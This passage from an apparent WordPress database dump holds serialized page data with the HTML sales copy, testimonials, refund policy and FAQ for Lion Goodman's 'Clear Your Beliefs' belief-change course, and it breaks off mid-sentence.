organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n	<strong>=> <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n	<strong>=> <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n	<strong>=> <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n	<strong>=> <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n	<strong>=> <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n	<strong>=> <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n	<strong>=> <em>Professional Coaching Sessions:</strong> </em> Optional.\n\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1941, 2225, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:73097:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/129244809?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook1.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook1.png" alt="clear your beliefs" width="1" height="1" class="aligncenter" size-medium wp-image-1475" /></a></p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></h1>\n\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package" >Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in 